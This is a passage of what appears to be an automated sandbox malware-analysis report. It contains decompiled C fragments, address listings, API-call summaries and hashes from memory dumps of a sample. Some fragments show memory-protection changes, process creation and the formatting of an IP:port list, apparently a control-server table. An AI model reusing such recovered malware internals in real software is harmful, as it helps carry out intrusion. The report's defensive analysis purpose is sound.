                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *_t34 = E001018A0(_t35);
                                                                                                                                                                                                                                                                                          								return 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_t35 == 0) {
                                                                                                                                                                                                                                                                                          								_t18 = 0;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t18 = _t35 - 0x24;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E00102760(_t18 + 0x24, 1);
                                                                                                                                                                                                                                                                                          							 *_t34 = 0;
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t34 = E001017D0(_a8, _t35);
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x000ffcc0
                                                                                                                                                                                                                                                                                          0x000ffcc0
                                                                                                                                                                                                                                                                                          0x000ffcc0
                                                                                                                                                                                                                                                                                          0x000ffcc6
                                                                                                                                                                                                                                                                                          0x000ffcc8
                                                                                                                                                                                                                                                                                          0x000ffccc
                                                                                                                                                                                                                                                                                          0x000ffcd8
                                                                                                                                                                                                                                                                                          0x000ffcd8
                                                                                                                                                                                                                                                                                          0x000ffcde
                                                                                                                                                                                                                                                                                          0x000ffcde
                                                                                                                                                                                                                                                                                          0x000ffceb
                                                                                                                                                                                                                                                                                          0x000ffced
                                                                                                                                                                                                                                                                                          0x000ffcff
                                                                                                                                                                                                                                                                                          0x000ffcff
                                                                                                                                                                                                                                                                                          0x000ffd04
                                                                                                                                                                                                                                                                                          0x000ffd0a
                                                                                                                                                                                                                                                                                          0x000ffd27
                                                                                                                                                                                                                                                                                          0x000ffd9f
                                                                                                                                                                                                                                                                                          0x000ffda2
                                                                                                                                                                                                                                                                                          0x000ffd29
                                                                                                                                                                                                                                                                                          0x000ffd29
                                                                                                                                                                                                                                                                                          0x000ffd34
                                                                                                                                                                                                                                                                                          0x000ffd63
                                                                                                                                                                                                                                                                                          0x000ffd7f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ffd81
                                                                                                                                                                                                                                                                                          0x000ffd87
                                                                                                                                                                                                                                                                                          0x000ffd97
                                                                                                                                                                                                                                                                                          0x000ffd99
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ffd99
                                                                                                                                                                                                                                                                                          0x000ffd65
                                                                                                                                                                                                                                                                                          0x000ffd6c
                                                                                                                                                                                                                                                                                          0x000ffd74
                                                                                                                                                                                                                                                                                          0x000ffd74
                                                                                                                                                                                                                                                                                          0x000ffd36
                                                                                                                                                                                                                                                                                          0x000ffd38
                                                                                                                                                                                                                                                                                          0x000ffd3f
                                                                                                                                                                                                                                                                                          0x000ffd3a
                                                                                                                                                                                                                                                                                          0x000ffd3a
                                                                                                                                                                                                                                                                                          0x000ffd3a
                                                                                                                                                                                                                                                                                          0x000ffd47
                                                                                                                                                                                                                                                                                          0x000ffd4c
                                                                                                                                                                                                                                                                                          0x000ffd58
                                                                                                                                                                                                                                                                                          0x000ffd58
                                                                                                                                                                                                                                                                                          0x000ffd34
                                                                                                                                                                                                                                                                                          0x000ffd0c
                                                                                                                                                                                                                                                                                          0x000ffd16
                                                                                                                                                                                                                                                                                          0x000ffd18
                                                                                                                                                                                                                                                                                          0x000ffd1e
                                                                                                                                                                                                                                                                                          0x000ffd1e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 000FFCD8
                                                                                                                                                                                                                                                                                            • Part of subcall function 001018A0: GetKeyState.USER32(00000010), ref: 001018B1
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,000F6D4C,?,?,?), ref: 000FFCF9
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$RegisterSendStateWindow
                                                                                                                                                                                                                                                                                          • String ID: commdlg_FindReplace
                                                                                                                                                                                                                                                                                          • API String ID: 3664076641-2356178745
                                                                                                                                                                                                                                                                                          • Opcode ID: af8e38f67c192ec8b8c21afabcb2bd776f1ef28e8fc463d88611ca9a5dd296b0
                                                                                                                                                                                                                                                                                          • Instruction ID: 89837df76a5b21b97f8db241c4b44e87b0ac7e90d3a4c3ca792c0aca3cf35b58
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af8e38f67c192ec8b8c21afabcb2bd776f1ef28e8fc463d88611ca9a5dd296b0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221D23160020E5BEB60EB54D840BBA77E5EF24304F508425FA848FA80D3B699D0DB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02552468
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 025524B2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                          • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                                          • Opcode ID: b16394fa20b53696b95bf9fd782d0f4f81de62aef76d87a5cc9a7adc94fcb204
                                                                                                                                                                                                                                                                                          • Instruction ID: 07a3b8df6676385e53dd5315d9c9554d12e0610a63641dbce70cdddeeb0f0918
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b16394fa20b53696b95bf9fd782d0f4f81de62aef76d87a5cc9a7adc94fcb204
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F21EAB0D00219EFDF14CF94C994BAEBBB5BF44304F10859ADD09AB240D774AB44DB59
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                                          						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                                          						L0400B1EC();
                                                                                                                                                                                                                                                                                          						_v20 = _t31;
                                                                                                                                                                                                                                                                                          						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x040078d6
                                                                                                                                                                                                                                                                                          0x040078de
                                                                                                                                                                                                                                                                                          0x040078f8
                                                                                                                                                                                                                                                                                          0x0400790a
                                                                                                                                                                                                                                                                                          0x04007922
                                                                                                                                                                                                                                                                                          0x0400792d
                                                                                                                                                                                                                                                                                          0x0400792e
                                                                                                                                                                                                                                                                                          0x04007933
                                                                                                                                                                                                                                                                                          0x0400795a
                                                                                                                                                                                                                                                                                          0x04007960
                                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                                          0x0400796f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                                          • Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                                          • Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                          			E000FD80E(int __ebx, intOrPtr* __esi) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                                          				int _t55;
                                                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t72;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t72 = __esi;
                                                                                                                                                                                                                                                                                          				_t55 = __ebx;
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					_t57 =  *((intOrPtr*)(_t73 - 0x228));
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t72 + 0x118)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						 *((char*)(_t73 - 0x110)) = 0;
                                                                                                                                                                                                                                                                                          						E00106820(_t73 - 0x10f, 0, 0x103);
                                                                                                                                                                                                                                                                                          						_t33 =  *((intOrPtr*)(_t73 - 0x228));
                                                                                                                                                                                                                                                                                          						_t76 = _t75 + 0xc;
                                                                                                                                                                                                                                                                                          						if(_t33 < 0 || _t33 >=  *((intOrPtr*)(_t72 + 4))) {
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							E000F6040( *_t72 + _t55, _t73 - 0x110,  *((intOrPtr*)(_t72 + 0x118)));
                                                                                                                                                                                                                                                                                          							_push(_t73 - 0x110);
                                                                                                                                                                                                                                                                                          							E000F4980(_t73 - 0x220, "&%i %s", _t70);
                                                                                                                                                                                                                                                                                          							_t75 = _t76 + 0x14;
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_t57 < 0 || _t57 >=  *((intOrPtr*)(_t72 + 4))) {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							InsertMenuA( *(_t72 + 0x10), _t55, 0x400, 0xe110, _t72 + 0x14);
                                                                                                                                                                                                                                                                                          							_t65 =  *(_t72 + 0x10);
                                                                                                                                                                                                                                                                                          							EnableMenuItem( *(_t72 + 0x10), 0xe110, 1);
                                                                                                                                                                                                                                                                                          							 *(_t73 - 0x224) = 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_push( *_t72 + _t55);
                                                                                                                                                                                                                                                                                          							E000F4980(_t73 - 0x220, "&%i %s", _t70);
                                                                                                                                                                                                                                                                                          							_t75 = _t75 + 0xc;
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					DeleteMenu( *(_t72 + 0x10),  *(_t73 - 0x224) + _t55, 0x400);
                                                                                                                                                                                                                                                                                          					_pop(_t71);
                                                                                                                                                                                                                                                                                          					_pop(_t56);
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t56,  *(_t73 - 4) ^ _t73, _t65, _t71, _t72);
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					_t15 = _t70 + 0xe10f; // 0xe111
                                                                                                                                                                                                                                                                                          					_t65 =  *(_t72 + 0x10);
                                                                                                                                                                                                                                                                                          					InsertMenuA( *(_t72 + 0x10),  *(_t73 - 0x22c) + _t70 - 1, 0x400, _t15, _t73 - 0x220);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t73 - 0x228)) =  *((intOrPtr*)(_t73 - 0x228)) - 1;
                                                                                                                                                                                                                                                                                          					_t51 =  *(_t73 - 0x224) + 1;
                                                                                                                                                                                                                                                                                          					_t55 = _t55 - 0x104;
                                                                                                                                                                                                                                                                                          					_t70 = _t70 + 1;
                                                                                                                                                                                                                                                                                          					 *(_t73 - 0x224) = _t51;
                                                                                                                                                                                                                                                                                          				} while (_t51 <  *((intOrPtr*)(_t73 - 0x230)));
                                                                                                                                                                                                                                                                                          				_t55 =  *(_t73 - 0x22c);
                                                                                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x000fd80e
                                                                                                                                                                                                                                                                                          0x000fd80e
                                                                                                                                                                                                                                                                                          0x000fd810
                                                                                                                                                                                                                                                                                          0x000fd810
                                                                                                                                                                                                                                                                                          0x000fd81d
                                                                                                                                                                                                                                                                                          0x000fd859
                                                                                                                                                                                                                                                                                          0x000fd860
                                                                                                                                                                                                                                                                                          0x000fd865
                                                                                                                                                                                                                                                                                          0x000fd86b
                                                                                                                                                                                                                                                                                          0x000fd870
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd87f
                                                                                                                                                                                                                                                                                          0x000fd891
                                                                                                                                                                                                                                                                                          0x000fd89c
                                                                                                                                                                                                                                                                                          0x000fd8a9
                                                                                                                                                                                                                                                                                          0x000fd8ae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd8ae
                                                                                                                                                                                                                                                                                          0x000fd81f
                                                                                                                                                                                                                                                                                          0x000fd821
                                                                                                                                                                                                                                                                                          0x000fd907
                                                                                                                                                                                                                                                                                          0x000fd912
                                                                                                                                                                                                                                                                                          0x000fd92b
                                                                                                                                                                                                                                                                                          0x000fd931
                                                                                                                                                                                                                                                                                          0x000fd93c
                                                                                                                                                                                                                                                                                          0x000fd942
                                                                                                                                                                                                                                                                                          0x000fd830
                                                                                                                                                                                                                                                                                          0x000fd834
                                                                                                                                                                                                                                                                                          0x000fd841
                                                                                                                                                                                                                                                                                          0x000fd846
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd846
                                                                                                                                                                                                                                                                                          0x000fd821
                                                                                                                                                                                                                                                                                          0x000fd94c
                                                                                                                                                                                                                                                                                          0x000fd95e
                                                                                                                                                                                                                                                                                          0x000fd967
                                                                                                                                                                                                                                                                                          0x000fd96f
                                                                                                                                                                                                                                                                                          0x000fd978
                                                                                                                                                                                                                                                                                          0x000fd8b1
                                                                                                                                                                                                                                                                                          0x000fd8be
                                                                                                                                                                                                                                                                                          0x000fd8c5
                                                                                                                                                                                                                                                                                          0x000fd8d3
                                                                                                                                                                                                                                                                                          0x000fd8df
                                                                                                                                                                                                                                                                                          0x000fd8e5
                                                                                                                                                                                                                                                                                          0x000fd8e6
                                                                                                                                                                                                                                                                                          0x000fd8ec
                                                                                                                                                                                                                                                                                          0x000fd8ed
                                                                                                                                                                                                                                                                                          0x000fd8f3
                                                                                                                                                                                                                                                                                          0x000fd8ff
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FD860
                                                                                                                                                                                                                                                                                          • InsertMenuA.USER32(?,?,00000400,0000E110,00000000), ref: 000FD8D3
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 000FD912
                                                                                                                                                                                                                                                                                          • InsertMenuA.USER32(?,00000000,00000400,0000E110,?), ref: 000FD92B
                                                                                                                                                                                                                                                                                          • EnableMenuItem.USER32 ref: 000FD93C
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4980: wvsprintfA.USER32(?,?,?), ref: 000F498C
                                                                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000001,00000400), ref: 000FD95E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$Insert$DeleteEnableExceptionItemRaise_memsetwvsprintf
                                                                                                                                                                                                                                                                                          • String ID: &%i %s
                                                                                                                                                                                                                                                                                          • API String ID: 3482434871-915073524
                                                                                                                                                                                                                                                                                          • Opcode ID: 0459495a31b1b860f5dd0a44b17909ad2424c8829f0c9346e38965902d331c32
                                                                                                                                                                                                                                                                                          • Instruction ID: a35f7620c3001701e563f6c31908b31ccbdde2bb6d32032969c9f9e269cddd90
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0459495a31b1b860f5dd0a44b17909ad2424c8829f0c9346e38965902d331c32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E118271A00209ABCB24CF64ECC9EF9B3B5FB48314F10469DE65A97681DB70AE85DF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                                                                                          			E000F8400(void* __eax, signed int __edx) {
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __edx;
                                                                                                                                                                                                                                                                                          				_t30 = __eax;
                                                                                                                                                                                                                                                                                          				if( *((char*)(__eax + 0x2a8)) == 0) {
                                                                                                                                                                                                                                                                                          					_t11 = E000F7370(__eax + 0x250, __eflags);
                                                                                                                                                                                                                                                                                          					__eflags = _t11;
                                                                                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          						_t28 = _t30;
                                                                                                                                                                                                                                                                                          						E000F8160(_t30);
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t18 = E000F7250(__eax + 0x2a8, __eax + 0x250);
                                                                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                                                                          					if(_t18 == 0) {
                                                                                                                                                                                                                                                                                          						MessageBoxA( *(_t30 + 4), "Error writing file!\n", 0x11293e, ??);
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t30 + 0x254), 0xb9, 0, ??);
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						E000FB170(_t30 + 0x108, _t30 + 0x2a8, _t26);
                                                                                                                                                                                                                                                                                          						E000FB730(_t30 + 0x108, _t26, _t28);
                                                                                                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x000f8400
                                                                                                                                                                                                                                                                                          0x000f8402
                                                                                                                                                                                                                                                                                          0x000f840c
                                                                                                                                                                                                                                                                                          0x000f845c
                                                                                                                                                                                                                                                                                          0x000f8461
                                                                                                                                                                                                                                                                                          0x000f8463
                                                                                                                                                                                                                                                                                          0x000f8465
                                                                                                                                                                                                                                                                                          0x000f8467
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8467
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f840e
                                                                                                                                                                                                                                                                                          0x000f841b
                                                                                                                                                                                                                                                                                          0x000f8420
                                                                                                                                                                                                                                                                                          0x000f8424
                                                                                                                                                                                                                                                                                          0x000f844a
                                                                                                                                                                                                                                                                                          0x000f8450
                                                                                                                                                                                                                                                                                          0x000f8455
                                                                                                                                                                                                                                                                                          0x000f8426
                                                                                                                                                                                                                                                                                          0x000f8434
                                                                                                                                                                                                                                                                                          0x000f846c
                                                                                                                                                                                                                                                                                          0x000f8478
                                                                                                                                                                                                                                                                                          0x000f8483
                                                                                                                                                                                                                                                                                          0x000f848a
                                                                                                                                                                                                                                                                                          0x000f848d
                                                                                                                                                                                                                                                                                          0x000f848d
                                                                                                                                                                                                                                                                                          0x000f8424

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F7250: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,08000020,00000000), ref: 000F726A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F8434
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F844A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$CreateFileSend
                                                                                                                                                                                                                                                                                          • String ID: Error writing file!
                                                                                                                                                                                                                                                                                          • API String ID: 162256061-2951117137
                                                                                                                                                                                                                                                                                          • Opcode ID: cb6493fbbe0ff92558e4687fdf51d03a99c0b01426ad9ff0baf4deffaba31074
                                                                                                                                                                                                                                                                                          • Instruction ID: 04729b34afbc147835867db1b4e926edadca213db1c84b67ea870a772a22f0ff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6493fbbe0ff92558e4687fdf51d03a99c0b01426ad9ff0baf4deffaba31074
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3018F312147096FD364E770CC85BE7B3D8AF80711F144929F396D6491EFB0B885A764
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0252367B
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02523689
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
